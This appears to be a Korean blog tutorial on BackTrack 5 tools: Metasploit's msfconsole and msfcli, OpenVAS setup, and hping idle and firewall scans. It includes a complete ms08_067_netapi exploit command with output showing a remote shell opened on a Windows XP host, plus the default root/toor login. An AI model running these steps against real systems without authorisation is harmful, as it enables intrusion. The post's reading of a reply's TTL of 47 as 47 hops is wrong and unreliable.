구텐모르겐 AmeriKa

MSFconsole: Metasploit Framework에서 가장 핵심이 되는 부분으로써 가장 안정적이고 많은 기능을 제공하는 툴중에 하나이다. msfconsole은 Metasploit Framework에서 제공할 수 있는 모든 옵션을 구현가능하고 이 툴 하나만으로 exploit을 실행하거나, auxiliary modules을 실행하거나 하는 등의 모든 기능을 수행해 낼수 있다. 기본적으로 Metasploit Framework은 계속적으로 업데이트되면서 발전해나가는 툴이지만 msfconsole은 항상 변하지 않는 중요한 역할을 한다. 기본적인 msfconsole의 기능을 익힘으로써 다른 업데이트의 기능을 손쉽게 적용시킬수 있다. 아마도 이 msfconsole에 대한 이야기는 계속 하게 될듯하다.

MSFconsole의 실행: 컴멘드에서 (물론 백트랙5에서) msfconsole을 친다.

root@bt:/# cd /opt/framework3/msf3/
root@bt:/opt/framework/msf3# msfconsole
< metasploit >
------------
  \ ,__,
  \ (oo)____
      (__) )\
      ||--|| *
msf >

help명령어를 통해 기본적인 명령어들을 익힐 수 있다.

MSFcli: msfcli와 msfconsole는 Framework에 접속하는데 서로 다른 방법을 사용한다. msfconsole은 사용자적인 측면에서 모든 기능에 대한 접근이 가능하다면 msfcli는 다른 콘솔툴과의 스크립팅하는데 중심이 되어 있다. Framework에 값을 전달해주는 것이 아니라 컴멘드를 통해 다른 콘솔들과의 직접적인 연결을 가능하게 해준다. 또한 exploit와 auxiliary modules의 실행을 지원하고 또한 modules을 테스트할때에도 유용하게 사용된다. 만약 여러분이 정확히 어떠한 툴과 어떠한 기능을 사용할지에 대해 알고 있다면 msfcli가 msfconsole보다 확실히 여러분의 작업을 수행하는데 도움을 줄 것이다.

root@bt:/opt/framework3/msf3# msfcli -h
Usage: /opt/framework3/msf3/msfcli <exploit_name> <option=value> [mode]
==============================================================================
Mode Description
---- ---------------
(H)elp You're looking at it, baby!
(S)ummary Show information about this module
(O)ptions Show available options for this module
(A)dvanced Show available advanced options for this module
(I)DS Evasion Show available ids evasion options for this module
(P)ayloads Show available payloads for this module
(T)argets Show available targets for this exploit module
(AC)tions Show available actions for this auxiliary module
(C)heck Run the check routine of the selected module
(E)xecute Execute the selected module
root@bt:/opt/framework3/msf3#

MSFcli 예제: 이제 msfcli의 사용법에 대해 간단히 알아보겠다. 여러분이 Metasploit을 사용중에 어려움에 부딧힐때 옵션 O를 통해 많은 도움을 받을 수 있다. 예를 들어 아래와 같이 ms08_067_netapi를 사용할때 옵션 O를 붙이면,

root@bt:/# msfcli windows/smb/ms08_067_netapi O
[*] Please wait while we load the module tree...
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 0.0.0.0 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)

ms_08_067_netapi가 RHOST, RPORT, SMBPIPE의 세가지 옵션을 필요로 함을 알 수 있다. 또한 옵션 p를 사용함으로 사용가능한 payload를 알 수 있다.

root@bt:/# msfcli windows/smb/ms08_067_netapi RHOST=192.168.1.155 P
[*] Please wait while we load the module tree...
Metasploit Basics 11
Compatible payloads
===================
Name Description
---- -----------
generic/debug_trap Generate a debug trap in the target process
generic/shell_bind_tcp Listen for a connection and spawn a command shell

필요한 옵션과 payload를 설정해 준 후 우리는 옵션 E를 통해서 msfcli를 실행할 수 있다.

root@bt:/# msfcli windows/smb/ms08_067_netapi RHOST=192.168.1.155 PAYLOAD=windows/shell/bind_tcp E
[*] Please wait while we load the module tree...
[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Triggering the vulnerability...
[*] Sending stage (240 bytes)
[*] Command shell session 1 opened (192.168.1.101:46025 -> 192.168.1.155:4444)
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>

아래 윈도우 화면은 타겟 호스트이므로 이 exploit이 성공했음을 알 수 있다.

Armitage: armitage는 그래픽버전의 Metasploit라고 보면 된다. 물론 공짜이고 풍부한 기능과 편리성을 가지고 있다. 하지만 비록 armitage가 강력한 툴임은 사실이지만 컴멘드를 배우지 않고 클릭클릭만 배우다 보면 스크립트키디의 레벨을 벗어날 수 없으므로 armitage에 대한 설명은 하지 않고 넘어가겠다. 개인적으로도 nmap보다 zenmap사용후에 좀 더 기능을 효과적으로 사용하는데 한계를 느꼈다.

Armitage의 사용: armitage를 타이핑해주면 armitage가 실행된다. (물론 백트랙5에서 말이다.) armitage실행후 Attacks-Browser Attacks-windows 를 통해서 다양한 기능을 사용할 수 있음을 알 수 있다.

5. OpenVAS Manager 셋업
 
아래의 명령어를 통해 사용자 cert를 생성한다.

openvas-mkcert-client -n om -i

이후에 데이타베이스를 생성하고 매번 nvt를 업데이트 할때마다 데이타베이스를 아래와 같이 재생성해줘야한다.

openvasmd --rebuild

버전이 4.0.3 이하일시에는 몇초밖에 걸리지 않지만 버전 4.0.5이후에는 이전버전보다는 오래 걸리지만 좀더 많은 스캐닝 기능을 사용할 수 있을 것이다.

openvasad -c 'add_user' -n openvasadmin -r Admin

openvasadmin이 사용자이름이고 여러분 자신에 맞게 다시 바꿔도 무관하다.

root@bt:~# openvasad -c 'add_user' -n openvasadmin -r Admin Enter password: ad main:MESSAGE:5871:2011-05-26 04h57.08 BST: No rules file provided, the new user will have no restrictions. ad main:MESSAGE:5871:2011-05-26 04h57.08 BST: User openvasadmin has been successfully created. root@bt:~#

OpenVAS 매니저 실행

아래와 같은 명령어로 9390을 포트로 OpenVAS를 실행한다.

openvasmd -p 9390 -a 127.0.0.1

관리자 모드는 아래와 같이 접근하면 된다.

openvasad -a 127.0.0.1 -p 9393

Greenbone Security Assistant의 실행

이제 Greenbone Security Assistant를 실행한다. 이 Greenbone Security Assistant는 Nmap계의 Zenmap정도라고 생각하면 편리하다. 손쉽게 마우스로 사용가능하게 해 놓은게 Greenbone Security Assistant의 특징이다.

gsad --http-only --listen=127.0.0.1 -p 9392

Greenbone Security Desktop

Greenbone Security Desktop을 실행시키고 아까 생성시켰던 사용자의 이름과 패스워드를 적어준다.

이제 스캐닝 모드로 들어왔고 여러분은 이제 스캔할 모든 준비가 되어 있다.

웹 설정

웹페이지에서도 스캔이 가능한데 아까 실행했듯이 127.0.0.1:9392로 연결하면 Greenbone Security Desktop과 같은 화면을 보게 된다.

여기서 여러분은 네트워크의 스캔과 모든 스캔관련 작업을 하게 된다.

지금까지 OpenVAS의 세팅방법을 알아 보았다. 이제 Greenbone Security Desktop을 이용하여 nmap.org와 같은 사이트를 스캔하면서 취약점을 찾아보기 바란다. 명심할 점은 항상 스캔 데이타베이스를 최신으로 업데이트 하는 것이다.

Idle Scanning

요번에는 hping의 Idle scanning에 대해 적어보겠다. 우리말로 비활동중인 호스트의 스캔정도로 표현가능하겠지만 그냥 Idle scanning이라고 하겠다.

네트워크 패킷의 헤더에는 id값이란 것이 있는데 이것은 통신할때마다 기본적으로 1씩 증가하게 되어있다. (어떤 리눅스는 IP_ID값을 0으로 사용하기도 하고 방화벽에서 랜덤화된 값을 사용하기도 한다. 이럴때는 Idle scanning이 쓸모가 없다.) -r 옵션을 이용하여 호스트나 방화벽의 id값을 보고 타겟의 상태를 알 수 있다.

[root@localhost root]# hping -I eth0 -SA 192.168.10.1 HPING 192.168.10.1
(eth0 192.168.10.1): SA set, 40 headers + 0 data bytes
len=46 ip=192.168.10.1 flags=R seq=0 ttl=255 id=18106 win=0 rtt=0.4 ms
len=46 ip=192.168.10.1 flags=R seq=1 ttl=255 id=18107 win=0 rtt=0.4 ms
len=46 ip=192.168.10.1 flags=R seq=2 ttl=255 id=18108 win=0 rtt=0.4 ms
...
[root@localhost root]# hping -I eth0 -SA -r 192.168.10.1 HPING 192.168.10.1
(eth0 192.168.10.1): SA set, 40 headers + 0 data bytes
len=46 ip=192.168.10.1 flags=R seq=0 ttl=255 id=18109 win=0 rtt=0.4 ms
len=46 ip=192.168.10.1 flags=R seq=1 ttl=255 id=+1 win=0 rtt=0.4 ms
len=46 ip=192.168.10.1 flags=R seq=2 ttl=255 id=+1 win=0 rtt=0.4 ms
...

SYN 패킷을 보냈을때 해당 포트가 닫혀있을때에는 RST(reset) 패킷이 돌아오고 IP_ID값은 증가하지 않게 된다. 만약 포트가 열려있어서 IP_ID값이 증가했다면 이 포트는 열려있음을 알 수 있다. 즉 비활성화된 타겟에 대한 스캔중 id의 값이 +2가 된다면 해당 포트는 열려 있다고 보고 +1이라면 포트는 닫혀있다고 보면 된다.

Stealth Scan은 단순하게 SYN만을 타겟호스트에 보내고 ACK가 왔을때 이를 무시하는 것을 Stealth Scan이라고 한다.

Firewall Scanning 방화벽 스캔

다음은 방화벽을 스캔하는 방법에 대해 알아보겠다.

-t옵션은 IP헤더의 ttl값을 설정해줄수 있고 -z는 ctrl+z를 누를때마다 ttl값을 증가시킨다.

[root@localhost root]# hping -I eth0 -z -t 6 -S mail.test.com -p 143
HPING mail.test.com (eth0 10.5.5.3): S set, 40 headers + 0 data bytes
TTL 0 during transit from ip=10.1.5.3
7: TTL 0 during transit from ip=10.1.5.3
8: TTL 0 during transit from ip=10.2.5.3
9: TTL 0 during transit from ip=10.3.5.3
10: TTL 0 during transit from ip=10.4.5.3
11: TTL 0 during transit from ip=10.6.5.3
once you reach the server .
len=46 ip=10.5.5.3 flags=SA DF seq=33 ttl=47 id=0 win=5840 rtt=4341.3ms

위에서도 알 수 있듯이 mail.test.com은 47홉을 지나야지 타겟 네트워크에 도착하는 것을 알 수 있다. 이 방법은 기존의 UDP 뿐만 아니라 TCP에 대한 전반적인 스캔이 가능하므로 현재에도 많이 사용되는 방법이다.

hping이 물론 유용한 방법이긴 하지만 nmap이나 zenmap이 더 쉽고 유용하므로 둘의 사용법 또한 익혀놓는 것이 좋다. 이외에 backtrack에 있는 툳들을 하나씩 만져보는것도 필요하다. 언젠가는 하나씩 심도없이 다뤄보도록 할 예정이지만 언제 할지는 자신이 없다.

다음에는 hping을 이용한 SYN attack, Land attack등을 알아보도록 하겠다.

백트랙은 라이브씨디로 설치하고 VMWare Player로 가상씨디를 돌리는게 가장 편하다.

백트랙은 http://www.backtrack-linux.org/downloads/에서 설치씨디를 다운 가능하다.

백트랙씨디의 MD5값은 다음과 같다.

• BT5r1-KDE-64.torrent KDE 64bit md5sum: 7858c8f3d9efccd3fa886228e3716cb2
• BT5r1-KDE-32.torrent KDE 32bit md5sum: 38ff62f14cecce5c842df60cbadbdb22
• BT5r1-GNOME-64.torrent GNOME 64bit md5sum: 13b6bc940a34274675278fd14506a5d2
• BT5r1-GNOME-32.torrent GNOME 32bit md5sum: 49f3dda1e617cb6f4045735766839690
• BT5R1-GNOME-VM-32.torrent GNOME 32bit md5sum: 9cfafcdbb10ffd3fa7f7c9fe4fd1de06

윈도우에서는 SlavaSoft HashCalc의 hashcalc를 통해 MD5값을 확인 가능하다.

백트랙의 설치방법은 USB, VirtualBox 그리고 VMWare를 이용한 설치방법이 있다.

USB 설치방법

1. BackTrack최신버전을 다운받는다.
2. UNtbootin을 다운받는다.
3. USB 드라이브를 연결한다.
4. USB 드라이브를 FAT32로 포맷한다.
5. UNetbootin을 실행하고 diskimage옵션을 클릭한 후 백트랙 ISO를 선택해준다.
6. 어느정도의 공간을 부트영역으로 설정할지 정해준다.
7. USB 드라이브를 선택해주고, OK를 클릭한다.



8. 완료후에 USB를 통해 부팅을 하면 백트랙 5를 실행할 수 있을 것이다.
9. 기본 id/pw는 root/toor 이다.

VirtualBox와 VMWare Player에 대한 설치방법은 너무 쉬우므로 요청이 있을 시에만 설명해 놓도록 하겠다. ㅎ